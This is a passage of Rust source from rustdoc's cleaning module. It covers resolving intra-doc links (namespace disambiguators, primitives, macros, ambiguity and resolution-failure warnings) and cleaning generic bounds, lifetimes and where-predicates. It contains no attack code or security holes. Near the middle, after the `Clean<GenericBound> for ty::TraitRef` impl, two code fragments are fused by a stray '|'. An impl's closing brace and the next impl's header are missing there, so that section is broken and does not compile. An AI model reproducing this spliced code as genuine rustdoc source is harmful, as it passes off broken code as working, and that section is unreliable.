use html::format::href;
self.links.iter().filter_map(|&(ref s, did, ref fragment)| {
match did {
Some(did) => {
if let Some((mut href, ..)) = href(did) {
if let Some(ref fragment) = *fragment {
href.push_str("#");
href.push_str(fragment);
}
Some((s.clone(), href))
} else {
None
}
}
None => {
if let Some(ref fragment) = *fragment {
let cache = cache();
let url = match cache.extern_locations.get(krate) {
Some(&(_, ref src, ExternalLocation::Local)) =>
src.to_str().expect("invalid file path"),
Some(&(_, _, ExternalLocation::Remote(ref s))) => s,
Some(&(_, _, ExternalLocation::Unknown)) | None =>
"https://doc.rust-lang.org/nightly",
};
// This is a primitive so the url is done "by hand".
Some((s.clone(),
format!("{}{}std/primitive.{}.html",
url,
if !url.ends_with('/') { "/" } else { "" },
fragment)))
} else {
panic!("This isn't a primitive?!");
}
}
}
}).collect()
}
}
impl AttributesExt for Attributes {
    /// Delegates to the non-doc attributes; doc fragments never carry
    /// meta-item lists.
    fn lists<'a>(&'a self, name: &'a str) -> ListAttributesIter<'a> {
        self.other_attrs.lists(name)
    }
}
/// Given a def, returns its name and disambiguator for the value namespace.
///
/// Returns `None` for things which cannot be ambiguous since they exist in
/// both namespaces (structs and modules).
fn value_ns_kind(def: Def, path_str: &str) -> Option<(&'static str, String)> {
    let (kind, disambig) = match def {
        // structs, variants, and mods exist in both namespaces; skip them
        Def::StructCtor(..) | Def::Mod(..) | Def::Variant(..) | Def::VariantCtor(..) => {
            return None;
        }
        Def::Fn(..) => ("function", format!("{}()", path_str)),
        Def::Method(..) => ("method", format!("{}()", path_str)),
        Def::Const(..) => ("const", format!("const@{}", path_str)),
        Def::Static(..) => ("static", format!("static@{}", path_str)),
        _ => ("value", format!("value@{}", path_str)),
    };
    Some((kind, disambig))
}
/// Given a def, returns its name, the article to be used, and a disambiguator
/// for the type namespace.
fn type_ns_kind(def: Def, path_str: &str) -> (&'static str, &'static str, String) {
    let (kind, article) = match def {
        // we can still have non-tuple structs
        Def::Struct(..) => ("struct", "a"),
        Def::Enum(..) => ("enum", "an"),
        Def::Trait(..) => ("trait", "a"),
        Def::Union(..) => ("union", "a"),
        _ => ("type", "a"),
    };
    let disambig = format!("{}@{}", kind, path_str);
    (kind, article, disambig)
}
/// The span covering all doc fragments of `attrs`, or `DUMMY_SP` when the
/// item carries no documentation.
fn span_of_attrs(attrs: &Attributes) -> syntax_pos::Span {
    match (attrs.doc_strings.first(), attrs.doc_strings.last()) {
        (Some(first), Some(last)) => first.span().to(last.span()),
        _ => DUMMY_SP,
    }
}
/// Emits a warning for an intra-doc link that resolves in two namespaces,
/// suggesting the disambiguated spellings for both candidates.
fn ambiguity_error(cx: &DocContext, attrs: &Attributes,
                   path_str: &str,
                   article1: &str, kind1: &str, disambig1: &str,
                   article2: &str, kind2: &str, disambig2: &str) {
    let sp = span_of_attrs(attrs);
    let msg = format!("`{}` is both {} {} and {} {}",
                      path_str, article1, kind1, article2, kind2);
    let help = format!("try `{}` if you want to select the {}, \
                        or `{}` if you want to select the {}",
                       disambig1, kind1, disambig2, kind2);
    cx.sess()
      .struct_span_warn(sp, &msg)
      .help(&help)
      .emit();
}
/// Given an enum variant's def, returns the def of its enum and the URL
/// fragment pointing at the variant (`Name.v` anchor style).
fn handle_variant(cx: &DocContext, def: Def) -> Result<(Def, Option<String>), ()> {
    use rustc::ty::DefIdTree;

    // A variant whose parent enum cannot be located is unlinkable.
    let parent = cx.tcx.parent(def.def_id()).ok_or(())?;
    let variant = cx.tcx.expect_variant_def(def);
    Ok((Def::Enum(parent), Some(format!("{}.v", variant.name))))
}
/// The primitive types an intra-doc link may name, paired with their defs.
/// Consulted only for the type namespace (see `is_primitive`).
const PRIMITIVES: &[(&str, Def)] = &[
    ("u8", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::U8))),
    ("u16", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::U16))),
    ("u32", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::U32))),
    ("u64", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::U64))),
    ("u128", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::U128))),
    ("usize", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::Usize))),
    ("i8", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::I8))),
    ("i16", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::I16))),
    ("i32", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::I32))),
    ("i64", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::I64))),
    ("i128", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::I128))),
    ("isize", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::Isize))),
    ("f32", Def::PrimTy(hir::PrimTy::TyFloat(syntax::ast::FloatTy::F32))),
    ("f64", Def::PrimTy(hir::PrimTy::TyFloat(syntax::ast::FloatTy::F64))),
    ("str", Def::PrimTy(hir::PrimTy::TyStr)),
    ("bool", Def::PrimTy(hir::PrimTy::TyBool)),
    ("char", Def::PrimTy(hir::PrimTy::TyChar)),
];
/// Looks up `path_str` among the primitive type names. Primitives only live
/// in the type namespace, so a value-namespace query always misses.
fn is_primitive(path_str: &str, is_val: bool) -> Option<Def> {
    if is_val {
        return None;
    }
    for &(name, def) in PRIMITIVES {
        if name == path_str {
            return Some(def);
        }
    }
    None
}
/// Resolves a given string as a path, along with whether or not it is
/// in the value namespace. Also returns an optional URL fragment in the case
/// of variants and methods.
///
/// Returns `Err(())` whenever the path cannot be resolved in the requested
/// namespace; the caller decides whether to warn.
fn resolve(cx: &DocContext, path_str: &str, is_val: bool) -> Result<(Def, Option<String>), ()> {
    // In case we're in a module, try to resolve the relative path.
    if let Some(id) = cx.mod_ids.borrow().last() {
        let result = cx.resolver.borrow_mut()
            .with_scope(*id, |resolver| {
                resolver.resolve_str_path_error(DUMMY_SP, &path_str, is_val)
            });
        if let Ok(result) = result {
            // In case this is a trait item, skip the
            // early return and try looking for the trait.
            let value = match result.def {
                Def::Method(_) | Def::AssociatedConst(_) => true,
                Def::AssociatedTy(_) => false,
                Def::Variant(_) => return handle_variant(cx, result.def),
                // not a trait item, just return what we found
                _ => return Ok((result.def, None))
            };
            // The resolver found an associated item but in the wrong
            // namespace — treat as a failure.
            if value != is_val {
                return Err(())
            }
        } else if let Some(prim) = is_primitive(path_str, is_val) {
            // The fragment carries the primitive's name so `links()` can
            // build the `std/primitive.*.html` URL.
            return Ok((prim, Some(path_str.to_owned())))
        } else {
            // If resolution failed, it may still be a method
            // because methods are not handled by the resolver.
            // If so, bail when we're not looking for a value.
            if !is_val {
                return Err(())
            }
        }

        // Try looking for methods and associated items:
        // split `Type::item` into the item name and the type path.
        let mut split = path_str.rsplitn(2, "::");
        let mut item_name = if let Some(first) = split.next() {
            first
        } else {
            return Err(())
        };
        let mut path = if let Some(second) = split.next() {
            second
        } else {
            return Err(())
        };

        // Resolve the type half of the path in the type namespace.
        let ty = cx.resolver.borrow_mut()
            .with_scope(*id, |resolver| {
                resolver.resolve_str_path_error(DUMMY_SP, &path, false)
            })?;
        match ty.def {
            Def::Struct(did) | Def::Union(did) | Def::Enum(did) | Def::TyAlias(did) => {
                // First look for an inherent associated item with this name.
                let item = cx.tcx.inherent_impls(did).iter()
                    .flat_map(|imp| cx.tcx.associated_items(*imp))
                    .find(|item| item.ident.name == item_name);
                if let Some(item) = item {
                    let out = match item.kind {
                        ty::AssociatedKind::Method if is_val => "method",
                        ty::AssociatedKind::Const if is_val => "associatedconstant",
                        _ => return Err(())
                    };
                    Ok((ty.def, Some(format!("{}.{}", out, item_name))))
                } else {
                    // Otherwise try fields (struct fields / enum fields).
                    let is_enum = match ty.def {
                        Def::Enum(_) => true,
                        _ => false,
                    };
                    // NOTE(review): for enums this searches the fields of all
                    // variants but emits a `variant.` fragment — looks
                    // suspicious; confirm against rendered anchors.
                    let elem = if is_enum {
                        cx.tcx.adt_def(did).all_fields().find(|item| item.ident.name == item_name)
                    } else {
                        cx.tcx.adt_def(did)
                            .non_enum_variant()
                            .fields
                            .iter()
                            .find(|item| item.ident.name == item_name)
                    };
                    if let Some(item) = elem {
                        Ok((ty.def,
                            Some(format!("{}.{}",
                                         if is_enum { "variant" } else { "structfield" },
                                         item.ident))))
                    } else {
                        Err(())
                    }
                }
            }
            Def::Trait(did) => {
                // Trait items: distinguish required vs provided methods for
                // the anchor kind.
                let item = cx.tcx.associated_item_def_ids(did).iter()
                    .map(|item| cx.tcx.associated_item(*item))
                    .find(|item| item.ident.name == item_name);
                if let Some(item) = item {
                    let kind = match item.kind {
                        ty::AssociatedKind::Const if is_val => "associatedconstant",
                        ty::AssociatedKind::Type if !is_val => "associatedtype",
                        ty::AssociatedKind::Method if is_val => {
                            if item.defaultness.has_value() {
                                "method"
                            } else {
                                "tymethod"
                            }
                        }
                        _ => return Err(())
                    };
                    Ok((ty.def, Some(format!("{}.{}", kind, item_name))))
                } else {
                    Err(())
                }
            }
            _ => Err(())
        }
    } else {
        // Not inside any module: nothing to resolve against.
        Err(())
    }
}
/// Resolves a string as a macro.
fn macro_resolve(cx: &DocContext, path_str: &str) -> Option<Def> {
    use syntax::ext::base::{MacroKind, SyntaxExtension};
    use syntax::ext::hygiene::Mark;

    let path = ast::Path {
        segments: vec![ast::PathSegment::from_ident(Ident::from_str(path_str))],
        span: DUMMY_SP,
    };
    let mut resolver = cx.resolver.borrow_mut();
    let res = resolver.resolve_macro_to_def_inner(Mark::root(), &path, MacroKind::Bang, false);
    match res {
        // Only declarative macros resolved this way are linkable; other
        // syntax extensions yield `None`.
        Ok(def) => match *resolver.get_macro(def) {
            SyntaxExtension::DeclMacro { .. } => Some(def),
            _ => None,
        },
        // Fall back to the global `macro_rules!` table.
        Err(_) => resolver.all_macros.get(&Symbol::intern(path_str)).cloned(),
    }
}
/// The namespace hinted at by an intra-doc link's prefix (`macro@`, `struct@`,
/// …) or suffix (`()`, `!`), used to direct resolution.
#[derive(Debug)]
enum PathKind {
    /// can be either value or type, not a macro
    Unknown,
    /// macro
    Macro,
    /// values, functions, consts, statics, everything in the value namespace
    Value,
    /// types, traits, everything in the type namespace
    Type,
}
/// Emits the `intra_doc_link_resolution_failure` lint for a link that could
/// not be resolved, pointing at the link's location inside the doc comment
/// when it can be computed.
fn resolution_failure(
    cx: &DocContext,
    attrs: &Attributes,
    path_str: &str,
    dox: &str,
    link_range: Option<Range<usize>>,
) {
    let sp = span_of_attrs(attrs);
    let msg = format!("`[{}]` cannot be resolved, ignoring it...", path_str);
    // Source text behind the attribute span, used to map the offset within
    // the collapsed docs back to real source positions.
    let code_dox = sp.to_src(cx);

    // Width of the `///` marker on each doc-comment line.
    let doc_comment_padding = 3;
    let mut diag = if let Some(link_range) = link_range {
        // blah blah blah\nblah\nblah [blah] blah blah\nblah blah
        //                       ^    ~~~~~~
        //                       |    link_range
        //                       last_new_line_offset
        let mut diag;
        if dox.lines().count() == code_dox.lines().count() {
            // Line counts match, so every doc line corresponds 1:1 to a
            // source line and a precise sub-span can be computed.
            let line_offset = dox[..link_range.start].lines().count();
            // The span starts in the `///`, so we don't have to account for the leading whitespace
            let code_dox_len = if line_offset <= 1 {
                doc_comment_padding
            } else {
                // The first `///`
                doc_comment_padding +
                    // Each subsequent leading whitespace and `///`
                    code_dox.lines().skip(1).take(line_offset - 1).fold(0, |sum, line| {
                        sum + doc_comment_padding + line.len() - line.trim().len()
                    })
            };

            // Extract the specific span
            let sp = sp.from_inner_byte_pos(
                link_range.start + code_dox_len,
                link_range.end + code_dox_len,
            );

            diag = cx.tcx.struct_span_lint_node(lint::builtin::INTRA_DOC_LINK_RESOLUTION_FAILURE,
                                                NodeId::new(0),
                                                sp,
                                                &msg);
            diag.span_label(sp, "cannot be resolved, ignoring");
        } else {
            // Line counts differ (e.g. `#[doc]` attributes involved), so fall
            // back to pointing at the whole attribute span and drawing the
            // link's position by hand.
            diag = cx.tcx.struct_span_lint_node(lint::builtin::INTRA_DOC_LINK_RESOLUTION_FAILURE,
                                                NodeId::new(0),
                                                sp,
                                                &msg);

            let last_new_line_offset = dox[..link_range.start].rfind('\n').map_or(0, |n| n + 1);
            let line = dox[last_new_line_offset..].lines().next().unwrap_or("");

            // Print the line containing the `link_range` and manually mark it with '^'s
            diag.note(&format!(
                "the link appears in this line:\n\n{line}\n\
                 {indicator: <before$}{indicator:^<found$}",
                line=line,
                indicator="",
                before=link_range.start - last_new_line_offset,
                found=link_range.len(),
            ));
        }
        diag
    } else {
        // No range information at all: lint against the attribute span only.
        cx.tcx.struct_span_lint_node(lint::builtin::INTRA_DOC_LINK_RESOLUTION_FAILURE,
                                     NodeId::new(0),
                                     sp,
                                     &msg)
    };
    diag.help("to escape `[` and `]` characters, just add '\\' before them like \
               `\\[` or `\\]`");
    diag.emit();
}
impl Clean<Attributes> for [ast::Attribute] {
    /// Cleans raw attributes into `Attributes`, and — on nightly builds —
    /// scans the collapsed docs for intra-doc links, resolving each one and
    /// recording the result in `attrs.links` for later rendering.
    fn clean(&self, cx: &DocContext) -> Attributes {
        let mut attrs = Attributes::from_ast(cx.sess().diagnostic(), self);

        if UnstableFeatures::from_environment().is_nightly_build() {
            let dox = attrs.collapsed_doc_value().unwrap_or_else(String::new);
            for (ori_link, link_range) in markdown_links(&dox) {
                // bail early for real links
                if ori_link.contains('/') {
                    continue;
                }
                // Strip code-formatting backticks before resolving.
                let link = ori_link.replace("`", "");
                let (def, fragment) = {
                    let mut kind = PathKind::Unknown;
                    // Classify the link by its disambiguator prefix/suffix and
                    // strip that marker off to get the bare path.
                    let path_str = if let Some(prefix) =
                        ["struct@", "enum@", "type@",
                         "trait@", "union@"].iter()
                            .find(|p| link.starts_with(**p)) {
                        kind = PathKind::Type;
                        link.trim_left_matches(prefix)
                    } else if let Some(prefix) =
                        ["const@", "static@",
                         "value@", "function@", "mod@",
                         "fn@", "module@", "method@"]
                            .iter().find(|p| link.starts_with(**p)) {
                        kind = PathKind::Value;
                        link.trim_left_matches(prefix)
                    } else if link.ends_with("()") {
                        kind = PathKind::Value;
                        link.trim_right_matches("()")
                    } else if link.starts_with("macro@") {
                        kind = PathKind::Macro;
                        link.trim_left_matches("macro@")
                    } else if link.ends_with('!') {
                        kind = PathKind::Macro;
                        link.trim_right_matches('!')
                    } else {
                        &link[..]
                    }.trim();

                    // Anything that isn't a plain (possibly `::`-separated)
                    // path cannot be an intra-doc link; skip it silently.
                    if path_str.contains(|ch: char| !(ch.is_alphanumeric() ||
                                                      ch == ':' || ch == '_')) {
                        continue;
                    }

                    match kind {
                        PathKind::Value => {
                            if let Ok(def) = resolve(cx, path_str, true) {
                                def
                            } else {
                                resolution_failure(cx, &attrs, path_str, &dox, link_range);
                                // this could just be a normal link or a broken link
                                // we could potentially check if something is
                                // "intra-doc-link-like" and warn in that case
                                continue;
                            }
                        }
                        PathKind::Type => {
                            if let Ok(def) = resolve(cx, path_str, false) {
                                def
                            } else {
                                resolution_failure(cx, &attrs, path_str, &dox, link_range);
                                // this could just be a normal link
                                continue;
                            }
                        }
                        PathKind::Unknown => {
                            // try everything!
                            if let Some(macro_def) = macro_resolve(cx, path_str) {
                                if let Ok(type_def) = resolve(cx, path_str, false) {
                                    let (type_kind, article, type_disambig)
                                        = type_ns_kind(type_def.0, path_str);
                                    ambiguity_error(cx, &attrs, path_str,
                                                    article, type_kind, &type_disambig,
                                                    "a", "macro", &format!("macro@{}", path_str));
                                    continue;
                                } else if let Ok(value_def) = resolve(cx, path_str, true) {
                                    let (value_kind, value_disambig)
                                        = value_ns_kind(value_def.0, path_str)
                                            .expect("struct and mod cases should have been \
                                                     caught in previous branch");
                                    ambiguity_error(cx, &attrs, path_str,
                                                    "a", value_kind, &value_disambig,
                                                    "a", "macro", &format!("macro@{}", path_str));
                                }
                                (macro_def, None)
                            } else if let Ok(type_def) = resolve(cx, path_str, false) {
                                // It is imperative we search for not-a-value first
                                // Otherwise we will find struct ctors for when we are looking
                                // for structs, and the link won't work.
                                // if there is something in both namespaces
                                if let Ok(value_def) = resolve(cx, path_str, true) {
                                    let kind = value_ns_kind(value_def.0, path_str);
                                    if let Some((value_kind, value_disambig)) = kind {
                                        let (type_kind, article, type_disambig)
                                            = type_ns_kind(type_def.0, path_str);
                                        ambiguity_error(cx, &attrs, path_str,
                                                        article, type_kind, &type_disambig,
                                                        "a", value_kind, &value_disambig);
                                        continue;
                                    }
                                }
                                type_def
                            } else if let Ok(value_def) = resolve(cx, path_str, true) {
                                value_def
                            } else {
                                resolution_failure(cx, &attrs, path_str, &dox, link_range);
                                // this could just be a normal link
                                continue;
                            }
                        }
                        PathKind::Macro => {
                            if let Some(def) = macro_resolve(cx, path_str) {
                                (def, None)
                            } else {
                                resolution_failure(cx, &attrs, path_str, &dox, link_range);
                                continue
                            }
                        }
                    }
                };

                // Primitives have no def id; their URL is built from the
                // fragment by `Attributes::links`.
                if let Def::PrimTy(_) = def {
                    attrs.links.push((ori_link, None, fragment));
                } else {
                    let id = register_def(cx, def);
                    attrs.links.push((ori_link, Some(id), fragment));
                }
            }

            cx.sess().abort_if_errors();
        }

        attrs
    }
}
/// A bound on a generic parameter: a (possibly modified, e.g. `?Sized`) trait
/// bound, or an outlives (lifetime) bound.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum GenericBound {
    TraitBound(PolyTrait, hir::TraitBoundModifier),
    Outlives(Lifetime),
}
impl GenericBound {
    /// Builds a `?Sized` bound referring to the `Sized` lang item.
    fn maybe_sized(cx: &DocContext) -> GenericBound {
        let sized_did = cx.tcx.require_lang_item(lang_items::SizedTraitLangItem);
        let substs = cx.tcx.intern_substs(&[]);
        let path = external_path(cx, &cx.tcx.item_name(sized_did).as_str(),
                                 Some(sized_did), false, vec![], substs);
        inline::record_extern_fqn(cx, sized_did, TypeKind::Trait);
        GenericBound::TraitBound(
            PolyTrait {
                trait_: ResolvedPath {
                    path,
                    typarams: None,
                    did: sized_did,
                    is_generic: false,
                },
                generic_params: Vec::new(),
            },
            hir::TraitBoundModifier::Maybe,
        )
    }

    /// Whether this is an unmodified bound on the `Sized` lang item.
    fn is_sized_bound(&self, cx: &DocContext) -> bool {
        use rustc::hir::TraitBoundModifier as TBM;
        match *self {
            GenericBound::TraitBound(PolyTrait { ref trait_, .. }, TBM::None) => {
                trait_.def_id() == cx.tcx.lang_items().sized_trait()
            }
            _ => false,
        }
    }

    /// Clones out the trait half of a trait bound, if this is one.
    fn get_poly_trait(&self) -> Option<PolyTrait> {
        match *self {
            GenericBound::TraitBound(ref poly, _) => Some(poly.clone()),
            _ => None,
        }
    }

    /// Clones out the bound's trait type, if this is a trait bound.
    fn get_trait_type(&self) -> Option<Type> {
        match *self {
            GenericBound::TraitBound(PolyTrait { ref trait_, .. }, _) => Some(trait_.clone()),
            _ => None,
        }
    }
}
impl Clean<GenericBound> for hir::GenericBound {
    fn clean(&self, cx: &DocContext) -> GenericBound {
        match *self {
            hir::GenericBound::Trait(ref t, modifier) => {
                GenericBound::TraitBound(t.clean(cx), modifier)
            }
            hir::GenericBound::Outlives(lt) => GenericBound::Outlives(lt.clean(cx)),
        }
    }
}
/// Cleans the generic arguments of an external path, sugaring `Fn`-family
/// paths like `Fn<(A, B,), C>` into the parenthesized `Fn(A, B)` form.
fn external_generic_args(cx: &DocContext, trait_did: Option<DefId>, has_self: bool,
                         bindings: Vec<TypeBinding>, substs: &Substs) -> GenericArgs {
    let lifetimes = substs.regions().filter_map(|v| v.clean(cx)).collect();
    let types = substs.types().skip(has_self as usize).collect::<Vec<_>>();

    let is_fn_trait = trait_did
        .map_or(false, |did| cx.tcx.lang_items().fn_trait_kind(did).is_some());
    if is_fn_trait {
        // `Fn`-family traits carry exactly one type argument: the input tuple.
        assert_eq!(types.len(), 1);
        if let ty::TyTuple(ref tys) = types[0].sty {
            let inputs = tys.iter().map(|t| t.clean(cx)).collect();
            // FIXME(#20299) return type comes from a projection now
            // match types[1].sty {
            //     ty::TyTuple(ref v) if v.is_empty() => None, // -> ()
            //     _ => Some(types[1].clean(cx))
            // };
            return GenericArgs::Parenthesized { inputs, output: None };
        }
        // Non-tuple input falls through to the angle-bracketed form.
    }

    GenericArgs::AngleBracketed {
        lifetimes,
        types: types.clean(cx),
        bindings,
    }
}
// trait_did should be set to a trait's DefId if called on a TraitRef, in order to sugar
// from Fn<(A, B,), C> to Fn(A, B) -> C
fn external_path(cx: &DocContext, name: &str, trait_did: Option<DefId>, has_self: bool,
                 bindings: Vec<TypeBinding>, substs: &Substs) -> Path {
    let segment = PathSegment {
        name: name.to_string(),
        args: external_generic_args(cx, trait_did, has_self, bindings, substs),
    };
    Path {
        global: false,
        def: Def::Err,
        segments: vec![segment],
    }
}
impl<'a, 'tcx> Clean<GenericBound> for (&'a ty::TraitRef<'tcx>, Vec<TypeBinding>) {
    /// Cleans a middle-IR trait reference (plus associated-type bindings)
    /// into a trait bound, collecting any late-bound lifetimes appearing in
    /// the trait's inputs into the bound's `generic_params`.
    fn clean(&self, cx: &DocContext) -> GenericBound {
        let (trait_ref, ref bounds) = *self;
        inline::record_extern_fqn(cx, trait_ref.def_id, TypeKind::Trait);
        let path = external_path(cx, &cx.tcx.item_name(trait_ref.def_id).as_str(),
                                 Some(trait_ref.def_id), true, bounds.clone(), trait_ref.substs);

        debug!("ty::TraitRef\n subst: {:?}\n", trait_ref.substs);

        // collect any late bound regions occurring (one tuple level deep)
        // in the trait's input types, skipping Self
        let mut late_bounds = vec![];
        for ty_s in trait_ref.input_types().skip(1) {
            if let ty::TyTuple(ts) = ty_s.sty {
                for &ty_s in ts {
                    if let ty::TyRef(ref reg, _, _) = ty_s.sty {
                        if let &ty::RegionKind::ReLateBound(..) = *reg {
                            debug!("  hit an ReLateBound {:?}", reg);
                            if let Some(Lifetime(name)) = reg.clean(cx) {
                                late_bounds.push(GenericParamDef {
                                    name,
                                    kind: GenericParamDefKind::Lifetime,
                                });
                            }
                        }
                    }
                }
            }
        }

        GenericBound::TraitBound(
            PolyTrait {
                trait_: ResolvedPath {
                    path,
                    typarams: None,
                    did: trait_ref.def_id,
                    is_generic: false,
                },
                generic_params: late_bounds,
            },
            hir::TraitBoundModifier::None
        )
    }
}
impl<'tcx> Clean<GenericBound> for ty::TraitRef<'tcx> {
fn clean(&self, cx: &DocContext) -> GenericBound {
(self, vec![]).clean(cx)
} | fn clean(&self, cx: &DocContext) -> Option<Vec<GenericBound>> {
let mut v = Vec::new();
v.extend(self.regions().filter_map(|r| r.clean(cx)).map(GenericBound::Outlives));
v.extend(self.types().map(|t| GenericBound::TraitBound(PolyTrait {
trait_: t.clean(cx),
generic_params: Vec::new(),
}, hir::TraitBoundModifier::None)));
if !v.is_empty() {Some(v)} else {None}
}
}
/// A lifetime stored as its rendered source text (e.g. `'a`, or
/// `'a: 'b + 'c` when bounds are folded in).
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct Lifetime(String);
impl Lifetime {
    /// Borrows the lifetime's textual representation.
    pub fn get_ref<'a>(&'a self) -> &'a str {
        &self.0
    }

    /// The `'static` lifetime.
    pub fn statik() -> Lifetime {
        Lifetime("'static".to_string())
    }
}
impl Clean<Lifetime> for hir::Lifetime {
    fn clean(&self, cx: &DocContext) -> Lifetime {
        if self.id != ast::DUMMY_NODE_ID {
            // Honor any lifetime substitution recorded for this region
            // (used when inlining with concrete lifetimes).
            let hir_id = cx.tcx.hir.node_to_hir_id(self.id);
            let substituted = match cx.tcx.named_region(hir_id) {
                Some(rl::Region::EarlyBound(_, node_id, _)) |
                Some(rl::Region::LateBound(_, node_id, _)) |
                Some(rl::Region::Free(_, node_id)) => {
                    cx.lt_substs.borrow().get(&node_id).cloned()
                }
                _ => None,
            };
            if let Some(lt) = substituted {
                return lt;
            }
        }
        Lifetime(self.name.ident().to_string())
    }
}
impl Clean<Lifetime> for hir::GenericParam {
    /// Renders a lifetime parameter, folding its outlives bounds into the
    /// text (`'a: 'b + 'c`). Panics on non-lifetime params.
    fn clean(&self, _: &DocContext) -> Lifetime {
        match self.kind {
            hir::GenericParamKind::Lifetime { .. } => {
                if self.bounds.is_empty() {
                    return Lifetime(self.name.ident().to_string());
                }
                let bound_names: Vec<String> = self.bounds.iter().map(|bound| {
                    match bound {
                        hir::GenericBound::Outlives(lt) => lt.name.ident().to_string(),
                        _ => panic!(),
                    }
                }).collect();
                Lifetime(format!("{}: {}", self.name.ident(), bound_names.join(" + ")))
            }
            _ => panic!(),
        }
    }
}
impl<'tcx> Clean<Lifetime> for ty::GenericParamDef {
    // NOTE(review): renders the param by name only; presumably only invoked
    // for lifetime params — confirm at call sites.
    fn clean(&self, _cx: &DocContext) -> Lifetime {
        Lifetime(self.name.to_string())
    }
}
impl Clean<Option<Lifetime>> for ty::RegionKind {
    /// Only regions with a user-visible name clean to `Some`; all other
    /// region kinds have no rendering and are dropped.
    fn clean(&self, cx: &DocContext) -> Option<Lifetime> {
        match *self {
            ty::ReStatic => Some(Lifetime::statik()),
            ty::ReLateBound(_, ty::BrNamed(_, name)) => Some(Lifetime(name.to_string())),
            ty::ReEarlyBound(ref data) => Some(Lifetime(data.name.clean(cx))),

            // Anonymous, internal, or erased regions: nothing to show.
            // (The catch-all `ReLateBound(..)` arm must stay after the
            // `BrNamed` arm above.)
            ty::ReLateBound(..) |
            ty::ReFree(..) |
            ty::ReScope(..) |
            ty::ReVar(..) |
            ty::ReSkolemized(..) |
            ty::ReEmpty |
            ty::ReClosureBound(_) |
            ty::ReCanonical(_) |
            ty::ReErased => None
        }
    }
}
/// A single clause of a `where` list: a bound on a type, a bound on a
/// lifetime, or an associated-type equality constraint.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum WherePredicate {
    BoundPredicate { ty: Type, bounds: Vec<GenericBound> },
    RegionPredicate { lifetime: Lifetime, bounds: Vec<GenericBound> },
    EqPredicate { lhs: Type, rhs: Type },
}
impl Clean<WherePredicate> for hir::WherePredicate {
    fn clean(&self, cx: &DocContext) -> WherePredicate {
        match *self {
            hir::WherePredicate::BoundPredicate(ref pred) => WherePredicate::BoundPredicate {
                ty: pred.bounded_ty.clean(cx),
                bounds: pred.bounds.clean(cx),
            },
            hir::WherePredicate::RegionPredicate(ref pred) => WherePredicate::RegionPredicate {
                lifetime: pred.lifetime.clean(cx),
                bounds: pred.bounds.clean(cx),
            },
            hir::WherePredicate::EqPredicate(ref pred) => WherePredicate::EqPredicate {
                lhs: pred.lhs_ty.clean(cx),
                rhs: pred.rhs_ty.clean(cx),
            },
        }
    }
}
impl<'a> Clean<WherePredicate> for ty::Predicate<'a> {
    /// Cleans the user-writable predicate kinds; the remaining kinds are
    /// compiler-internal and must never reach rustdoc.
    fn clean(&self, cx: &DocContext) -> WherePredicate {
        use rustc::ty::Predicate;

        match *self {
            Predicate::Trait(ref pred) => pred.clean(cx),
            Predicate::Subtype(ref pred) => pred.clean(cx),
            Predicate::RegionOutlives(ref pred) => pred.clean(cx),
            Predicate::TypeOutlives(ref pred) => pred.clean(cx),
            Predicate::Projection(ref pred) => pred.clean(cx),

            Predicate::WellFormed(_) |
            Predicate::ObjectSafe(_) |
            Predicate::ClosureKind(..) |
            Predicate::ConstEvaluatable(..) => panic!("not user writable"),
        }
    }
}
impl<'a> Clean<WherePredicate> for ty::TraitPredicate<'a> {
    /// A trait predicate `T: Trait` becomes a bound predicate on `T`.
    fn clean(&self, cx: &DocContext) -> WherePredicate {
        let ty = self.trait_ref.self_ty().clean(cx);
        let bound = self.trait_ref.clean(cx);
        WherePredicate::BoundPredicate { ty, bounds: vec![bound] }
    }
}
impl<'tcx> Clean<WherePredicate> for ty::SubtypePredicate<'tcx> {
    // Subtype predicates never originate from user-written code, so there is
    // nothing sensible to render; reaching this is a rustdoc bug.
    fn clean(&self, _cx: &DocContext) -> WherePredicate {
        panic!("subtype predicates are an internal rustc artifact \
                and should not be seen by rustdoc")
    }
}
impl<'tcx> Clean<WherePredicate> for ty::OutlivesPredicate<ty::Region<'tcx>, ty::Region<'tcx>> {
    /// A region-outlives predicate `'a: 'b` becomes a region predicate on
    /// `'a` whose only bound is `'b`. Both regions must be nameable.
    fn clean(&self, cx: &DocContext) -> WherePredicate {
        WherePredicate::RegionPredicate {
            lifetime: self.0.clean(cx).unwrap(),
            bounds: vec![GenericBound::Outlives(self.1.clean(cx).unwrap())],
        }
    }
}
impl<'tcx> Clean<WherePredicate> for ty::OutlivesPredicate<Ty<'tcx>, ty::Region<'tcx>> {
    /// A type-outlives predicate `T: 'a` becomes a bound predicate on `T`
    /// whose only bound is the (nameable) lifetime.
    fn clean(&self, cx: &DocContext) -> WherePredicate {
        WherePredicate::BoundPredicate {
            ty: self.0.clean(cx),
            bounds: vec![GenericBound::Outlives(self.1.clean(cx).unwrap())],
        }
    }
}
impl<'tcx> Clean<WherePredicate> for ty::ProjectionPredicate<'tcx> {
    /// A projection predicate becomes an equality constraint
    /// `<T as Trait>::Assoc == U`.
    fn clean(&self, cx: &DocContext) -> WherePredicate {
        let lhs = self.projection_ty.clean(cx);
        let rhs = self.ty.clean(cx);
        WherePredicate::EqPredicate { lhs, rhs }
    }
}
impl<'tcx> Clean<Type> for ty::ProjectionTy<'tcx> {
    /// Cleans an associated-type projection into a qualified path
    /// `<Self as Trait>::Name`.
    fn clean(&self, cx: &DocContext) -> Type {
        let trait_ = match self.trait_ref(cx.tcx).clean(cx) {
            GenericBound::TraitBound(t, _) => t.trait_,
            GenericBound::Outlives(_) => panic!("cleaning a trait got a lifetime"),
        };
